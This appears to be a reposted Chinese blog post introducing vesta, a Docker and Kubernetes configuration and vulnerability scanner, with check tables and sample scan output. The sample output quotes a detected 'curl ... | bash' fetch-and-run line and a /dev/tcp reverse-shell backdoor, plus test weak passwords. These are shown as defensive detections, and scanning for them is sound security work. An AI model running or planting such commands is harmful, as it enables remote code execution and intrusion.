Docker和Kubernetes配置安全基线检查工具vesta
nanshan 2025-05-08 03:52 28 浏览 0 评论
概述
vesta是一款集容器扫描,Docker和Kubernetes配置基线检查于一身的工具。检查内容包括镜像或容器中包含漏洞版本的组件,同时根据云上实战渗透经验检查Docker以及Kubernetes的危险配置
vesta同时也是一个灵活,方便的工具,能够在各种系统上运行,包括但不限于Windows,Linux以及MacOS
检查项
Scan
- 扫描通过主流安装方法安装程序的漏洞
- apt/apt-get
- rpm
- yum
- dpkg
- 扫描软件依赖的漏洞以及恶意投毒的依赖包
- Java(Jar, War, 以及主流依赖log4j)
- NodeJs(NPM, YARN)
- Python(Wheel, Poetry)
- Golang(Go binary)
- PHP(Composer, 以及主流的PHP框架: laravel, thinkphp, wordpress, wordpress插件等)
- Rust(Rust binary)
Docker检查
Supported | Check Item | Description | Severity | Reference |
PrivilegeAllowed | 危险的特权模式 | critical | Ref | |
Capabilities | 危险capabilities被设置 | critical | Ref | |
Volume Mount | 敏感或危险目录被挂载 | critical | Ref | |
Docker Unauthorized | 2375端口打开并且未授权 | critical | Ref | |
Kernel version | 当前内核版本存在逃逸漏洞 | critical | Ref | |
Network Module | Net模式为 host 模式或同时在特定containerd版本下 | critical/medium | ||
Pid Module | Pid模式被设置为 host | high | ||
Docker Server version | Docker Server版本存在漏洞 | critical/high/ medium/low | ||
Docker env password check | Docker env是否存在弱密码 | high/medium | ||
Docker history | Docker layers 存在不安全的命令 | high/medium | ||
Docker Backdoor | Docker env command 存在恶意命令 | critical/high | ||
Docker Swarm | Docker Swarm存在危险配置信息以及危险的容器检测 | medium/low |
Kubernetes检查
Supported | Check Item | Description | Severity | Reference |
PrivilegeAllowed | 危险的特权模式 | critical | Ref | |
Capabilities | 危险capabilities被设置 | critical | Ref | |
PV and PVC | PV 被挂载到敏感目录并且状态为active | critical/medium | Ref | |
RBAC | K8s 权限存在危险配置 | high/medium/ low/warning | ||
Kubernetes-dashborad | 检查 -enable-skip-login 以及 dashborad的账户权限 | critical/high/ low | Ref | |
Kernel version | 当前内核版本存在逃逸漏洞 | critical | Ref | |
Docker Server version (k8s versions is less than v1.24) | Docker Server版本存在漏洞 | critical/high/ medium/low | ||
Kubernetes certification expiration | 证书到期时间小于30天 | medium | ||
ConfigMap and Secret check | ConfigMap 或者 Secret是否存在弱密码 | high/medium | ||
PodSecurityPolicy check (k8s version under the v1.25) | PodSecurityPolicy过度容忍Pod不安全配置 | high/medium/low | Ref | |
Auto Mount ServiceAccount Token | Pod默认挂载了service token | critical/high/ medium/low | Ref | |
NoResourceLimits | 没有限制资源的使用,例如CPU,Memory, 存储 | low | Ref | |
Job and Cronjob | Job或CronJob没有设置seccomp或seLinux安全策略 | low | Ref | |
Envoy admin | Envoy admin被配置以及监听 0.0.0.0 . | high/medium | Ref | |
Cilium version | Cilium 存在漏洞版本 | critical/high/ medium/low | Ref | |
Istio configurations | Istio 存在漏洞版本以及安全配置检查 | critical/high/ medium/low | Ref | |
Kubelet 10255/10250 and Kubectl proxy | 存在node打开了10250或者10255并且未授权或 Kubectl proxy开启 | high/medium/ low | ||
Etcd configuration | Etcd 安全配置检查 | high/medium | ||
Sidecar configurations | Sidecar 安全配置检查以及Env环境检查 | critical/high/ medium/low | ||
Pod annotation | Pod annotation 存在不安全配置 | high/medium/ low/warning | Ref | |
DaemonSet | DaemonSet存在不安全配置 | critical/high/ medium/low | ||
Backdoor | 检查k8s中是否有后门 | critical/high | Ref | |
Lateral admin movement | Pod被特意配置到Master节点中 | medium/low |
编译并使用vesta
编译vesta
- 使用make build 进行编译
- 从Releases上下载可执行文件
使用vesta检查镜像过容器中的漏洞组件版本(使用镜像ID,镜像标签或使用-f文件输入均可)
$./vesta scan container -f example.tar
2022/11/29 22:50:19 Begin upgrading vulnerability database
2022/11/29 22:50:19 Vulnerability Database is already initialized
2022/11/29 22:50:19 Begin to analyze the layer
2022/11/29 22:50:35 Begin to scan the layer
Detected 216 vulnerabilities
+-----+--------------------+-----------------+------------------+-------+----------+------------------------------------------------------------------+
| 208 | python3.6 - Django | 2.2.3 | CVE-2019-14232 | 7.5 | high | An issue was discovered |
| | | | | | | in Django 1.11.x before |
| | | | | | | 1.11.23, 2.1.x before 2.1.11, |
| | | | | | | and 2.2.x before 2.2.4. If |
| | | | | | | django.utils.text.Truncator's |
| | | | | | | chars() and words() methods |
| | | | | | | were passed the html=True |
| | | | | | | argument, t ... |
+-----+ +-----------------+------------------+-------+----------+------------------------------------------------------------------+
| 209 | | 2.2.3 | CVE-2019-14233 | 7.5 | high | An issue was discovered |
| | | | | | | in Django 1.11.x before |
| | | | | | | 1.11.23, 2.1.x before 2.1.11, |
| | | | | | | and 2.2.x before 2.2.4. |
| | | | | | | Due to the behaviour of |
| | | | | | | the underlying HTMLParser, |
| | | | | | | django.utils.html.strip_tags |
| | | | | | | would be extremely ... |
+-----+ +-----------------+------------------+-------+----------+------------------------------------------------------------------+
| 210 | | 2.2.3 | CVE-2019-14234 | 9.8 | critical | An issue was discovered in |
| | | | | | | Django 1.11.x before 1.11.23, |
| | | | | | | 2.1.x before 2.1.11, and 2.2.x |
| | | | | | | before 2.2.4. Due to an error |
| | | | | | | in shallow key transformation, |
| | | | | | | key and index lookups for |
| | | | | | | django.contrib.postgres.f ... |
+-----+--------------------+-----------------+------------------+-------+----------+------------------------------------------------------------------+
| 211 | python3.6 - numpy | 1.24.2 | | 8.5 | high | Malicious package is detected in |
| | | | | | | '/usr/local/lib/python3.6/site-packages/numpy/setup.py', |
| | | | | | | malicious command "curl https://vuln.com | bash" are |
| | | | | | | detected. |
+-----+--------------------+-----------------+------------------+-------+----------+------------------------------------------------------------------+使用vesta检查Docker的基线配置
也可以在docker中使用
make run.docker$./vesta analyze docker
2022/11/29 23:06:32 Start analysing
Detected 3 vulnerabilities
+----+----------------------------+----------------+--------------------------------+----------+--------------------------------+
| ID | CONTAINER DETAIL | PARAM | VALUE | SEVERITY | DESCRIPTION |
+----+----------------------------+----------------+--------------------------------+----------+--------------------------------+
| 1 | Name: Kernel | kernel version | 5.10.104-linuxkit | critical | Kernel version is suffering |
| | ID: None | | | | the CVE-2022-0492 with |
| | | | | | CAP_SYS_ADMIN and v1 |
| | | | | | architecture of cgroups |
| | | | | | vulnerablility, has a |
| | | | | | potential container escape. |
+----+----------------------------+----------------+--------------------------------+----------+--------------------------------+
| 2 | Name: vesta_vuln_test | kernel version | 5.10.104-linuxkit | critical | Kernel version is suffering |
| | ID: 207cf8842b15 | | | | the Dirty Pipe vulnerablility, |
| | | | | | has a potential container |
| | | | | | escape. |
+----+----------------------------+----------------+--------------------------------+----------+--------------------------------+
| 3 | Name: Image Tag | Privileged | true | critical | There has a potential container|
| | ID: None | | | | escape in privileged module. |
| | | | | | |
+----+----------------------------+----------------+--------------------------------+----------+--------------------------------+
| 4 | Name: Image Configuration | Image History | Image name: | high | Weak password found |
| | ID: None | | vesta_history_test:latest | | | in command: ' echo |
| | | | Image ID: 4bc05e1e3881 | | 'password=test123456' > |
| | | | | | config.ini # buildkit'. |
+----+----------------------------+----------------+--------------------------------+----------+--------------------------------+使用vesta检查Kubernetes的基线配置
2022/11/29 23:15:59 Start analysing
2022/11/29 23:15:59 Getting docker server version
2022/11/29 23:15:59 Getting kernel version
Detected 4 vulnerabilities
Pods:
+----+--------------------------------+--------------------------------+--------------------------------+-----------------------+----------+--------------------------------+
| ID | POD DETAIL | PARAM | VALUE | TYPE | SEVERITY | DESCRIPTION |
+----+--------------------------------+--------------------------------+--------------------------------+-----------------------+----------+--------------------------------+
| 1 | Name: vulntest | Namespace: | sidecar name: vulntest | | true | Pod | critical | There has a potential |
| | default | Status: Running | | Privileged | | | | container escape in privileged |
| | Node Name: docker-desktop | | | | | module. |
+ + +--------------------------------+--------------------------------+-----------------------+----------+--------------------------------+
| | | sidecar name: vulntest | | Token:Password123456 | Sidecar EnvFrom | high | Sidecar envFrom ConfigMap has |
| | | env | | | | found weak password: |
| | | | | | | 'Password123456'. |
+ + +--------------------------------+--------------------------------+-----------------------+----------+--------------------------------+
| | | sidecar name: sidecartest | | MALWARE: bash -i >& | Sidecar Env | high | Container 'sidecartest' finds |
| | | env | /dev/tcp/10.0.0.1/8080 0>&1 | | | high risk content(score: |
| | | | | | | 0.91 out of 1.0), which is a |
| | | | | | | suspect command backdoor. |
+----+--------------------------------+--------------------------------+--------------------------------+-----------------------+----------+--------------------------------+
| 2 | Name: vulntest2 | Namespace: | sidecar name: vulntest2 | | CAP_SYS_ADMIN | capabilities.add | critical | There has a potential |
| | default | Status: Running | | capabilities | | | | container escape in privileged |
| | Node Name: docker-desktop | | | | | module. |
+ + +--------------------------------+--------------------------------+-----------------------+----------+--------------------------------+
| | | sidecar name: vulntest2 | | true | kube-api-access-lcvh8 | critical | Mount service account |
| | | automountServiceAccountToken | | | | and key permission are |
| | | | | | | given, which will cause a |
| | | | | | | potential container escape. |
| | | | | | | Reference clsuterRolebind: |
| | | | | | | vuln-clusterrolebinding | |
| | | | | | | roleBinding: vuln-rolebinding |
+ + +--------------------------------+--------------------------------+-----------------------+----------+--------------------------------+
| | | sidecar name: vulntest2 | | cpu | Pod | low | CPU usage is not limited. |
| | | Resource | | | | |
| | | | | | | |
+----+--------------------------------+--------------------------------+--------------------------------+-----------------------+----------+--------------------------------+
Configures:
+----+-----------------------------+--------------------------------+--------------------------------------------------------+----------+--------------------------------+
| ID | TYPEL | PARAM | VALUE | SEVERITY | DESCRIPTION |
+----+-----------------------------+--------------------------------+--------------------------------------------------------+----------+--------------------------------+
| 1 | K8s version less than v1.24 | kernel version | 5.10.104-linuxkit | critical | Kernel version is suffering |
| | | | | | the CVE-2022-0185 with |
| | | | | | CAP_SYS_ADMIN vulnerablility, |
| | | | | | has a potential container |
| | | | | | escape. |
+----+-----------------------------+--------------------------------+--------------------------------------------------------+----------+--------------------------------+
| 2 | ConfigMap | ConfigMap Name: vulnconfig | db.string:mysql+pymysql://dbapp:Password123@db:3306/db | high | ConfigMap has found weak |
| | | Namespace: default | | | password: 'Password123'. |
+----+-----------------------------+--------------------------------+--------------------------------------------------------+----------+--------------------------------+
| 3 | Secret | Secret Name: vulnsecret-auth | password:Password123 | high | Secret has found weak |
| | | Namespace: default | | | password: 'Password123'. |
+----+-----------------------------+--------------------------------+--------------------------------------------------------+----------+--------------------------------+
| 4 | ClusterRoleBinding | binding name: | verbs: get, watch, list, | high | Key permissions with key |
| | | vuln-clusterrolebinding | | create, update | resources: | | resources given to the |
| | | rolename: vuln-clusterrole | | pods, services | | default service account, which |
| | | kind: ClusterRole | subject | | | will cause a potential data |
| | | kind: Group | subject name: | | | leakage. |
| | | system:serviceaccounts:vuln | | | | |
| | | namespace: vuln | | | |
+----+-----------------------------+--------------------------------+--------------------------------------------------------+----------+--------------------------------+
| 5 | RoleBinding | binding name: vuln-rolebinding | verbs: get, watch, list, | high | Key permissions with key |
| | | | rolename: vuln-role | role | create, update | resources: | | resources given to the |
| | | kind: Role | subject kind: | pods, services | | default service account, which |
| | | ServiceAccount | subject name: | | | will cause a potential data |
| | | default | namespace: default | | | leakage. |
+----+-----------------------------+--------------------------------+--------------------------------------------------------+----------+--------------------------------+
| 6 | ClusterRoleBinding | binding name: | verbs: get, watch, list, | warning | Key permission are given |
| | | vuln-clusterrolebinding2 | | create, update | resources: | | to unknown user 'testUser', |
| | | rolename: vuln-clusterrole | | pods, services | | printing it for checking. |
| | | subject kind: User | subject | | | |
| | | name: testUser | namespace: | | | |
| | | all | | | |
+----+-----------------------------+--------------------------------+--------------------------------------------------------+----------+--------------------------------+使用方法
$./vesta -h
Vesta is a static analysis of vulnerabilities, Docker and Kubernetes configuration detect toolkit
Tutorial is available at https://github.com/kvesta/vesta
Usage:
vesta [command]
Available Commands:
analyze Kubernetes analyze
completion Generate the autocompletion script for the specified shell
help Help about any command
scan Container scan
update Update vulnerability database
version Print version information and quit
Flags:
-h, --help help for vesta项目地址:
https://github.com/kvesta/vesta/
相关推荐
- 0722-6.2.0-如何在RedHat7.2使用rpm安装CDH(无CM)
-
文档编写目的在前面的文档中,介绍了在有CM和无CM两种情况下使用rpm方式安装CDH5.10.0,本文档将介绍如何在无CM的情况下使用rpm方式安装CDH6.2.0,与之前安装C5进行对比。环境介绍:...
- ARM64 平台基于 openEuler + iSula 环境部署 Kubernetes
-
为什么要在arm64平台上部署Kubernetes,而且还是鲲鹏920的架构。说来话长。。。此处省略5000字。介绍下系统信息;o架构:鲲鹏920(Kunpeng920)oOS:ope...
- 生产环境starrocks 3.1存算一体集群部署
-
集群规划FE:节点主要负责元数据管理、客户端连接管理、查询计划和查询调度。>3节点。BE:节点负责数据存储和SQL执行。>3节点。CN:无存储功能能的BE。环境准备CPU检查JDK...
- 在CentOS上添加swap虚拟内存并设置优先级
-
现如今很多云服务器都会自己配置好虚拟内存,当然也有很多没有配置虚拟内存的,虚拟内存可以让我们的低配服务器使用更多的内存,可以减少很多硬件成本,比如我们运行很多服务的时候,内存常常会满,当配置了虚拟内存...
- 国产深度(deepin)操作系统优化指南
-
1.升级内核随着deepin版本的更新,会自动升级系统内核,但是我们依旧可以通过命令行手动升级内核,以获取更好的性能和更多的硬件支持。具体操作:-添加PPAs使用以下命令添加PPAs:```...
- postgresql-15.4 多节点主从(读写分离)
-
1、下载软件[root@TX-CN-PostgreSQL01-252software]#wgethttps://ftp.postgresql.org/pub/source/v15.4/postg...
- Docker 容器 Java 服务内存与 GC 优化实施方案
-
一、设置Docker容器内存限制(生产环境建议)1.查看宿主机可用内存bashfree-h#示例输出(假设宿主机剩余16GB可用内存)#Mem:64G...
- 虚拟内存设置、解决linux内存不够问题
-
虚拟内存设置(解决linux内存不够情况)背景介绍 Memory指机器物理内存,读写速度低于CPU一个量级,但是高于磁盘不止一个量级。所以,程序和数据如果在内存的话,会有非常快的读写速度。但是,内存...
- Elasticsearch性能调优(5):服务器配置选择
-
在选择elasticsearch服务器时,要尽可能地选择与当前业务量相匹配的服务器。如果服务器配置太低,则意味着需要更多的节点来满足需求,一个集群的节点太多时会增加集群管理的成本。如果服务器配置太高,...
- Es如何落地
-
一、配置准备节点类型CPU内存硬盘网络机器数操作系统data节点16C64G2000G本地SSD所有es同一可用区3(ecs)Centos7master节点2C8G200G云SSD所有es同一可用区...
- 针对Linux内存管理知识学习总结
-
现在的服务器大部分都是运行在Linux上面的,所以,作为一个程序员有必要简单地了解一下系统是如何运行的。对于内存部分需要知道:地址映射内存管理的方式缺页异常先来看一些基本的知识,在进程看来,内存分为内...
- MySQL进阶之性能优化
-
概述MySQL的性能优化,包括了服务器硬件优化、操作系统的优化、MySQL数据库配置优化、数据库表设计的优化、SQL语句优化等5个方面的优化。在进行优化之前,需要先掌握性能分析的思路和方法,找出问题,...
- Linux Cgroups(Control Groups)原理
-
LinuxCgroups(ControlGroups)是内核提供的资源分配、限制和监控机制,通过层级化进程分组实现资源的精细化控制。以下从核心原理、操作示例和版本演进三方面详细分析:一、核心原理与...
- linux 常用性能优化参数及理解
-
1.优化内核相关参数配置文件/etc/sysctl.conf配置方法直接将参数添加进文件每条一行.sysctl-a可以查看默认配置sysctl-p执行并检测是否有错误例如设置错了参数:[roo...
- 如何在 Linux 中使用 Sysctl 命令?
-
sysctl是一个用于配置和查询Linux内核参数的命令行工具。它通过与/proc/sys虚拟文件系统交互,允许用户在运行时动态修改内核参数。这些参数控制着系统的各种行为,包括网络设置、文件...
欢迎 你 发表评论:
- 一周热门
- 最近发表
- 标签列表
-
- linux 查询端口号 (58)
- docker映射容器目录到宿主机 (66)
- 杀端口 (60)
- yum更换阿里源 (62)
- internet explorer 增强的安全配置已启用 (65)
- linux自动挂载 (56)
- 禁用selinux (55)
- sysv-rc-conf (69)
- ubuntu防火墙状态查看 (64)
- windows server 2022激活密钥 (56)
- 无法与服务器建立安全连接是什么意思 (74)
- 443/80端口被占用怎么解决 (56)
- ping无法访问目标主机怎么解决 (58)
- fdatasync (59)
- 405 not allowed (56)
- 免备案虚拟主机zxhost (55)
- linux根据pid查看进程 (60)
- dhcp工具 (62)
- mysql 1045 (57)
- 宝塔远程工具 (56)
- ssh服务器拒绝了密码 请再试一次 (56)
- ubuntu卸载docker (56)
- linux查看nginx状态 (63)
- tomcat 乱码 (76)
- 2008r2激活序列号 (65)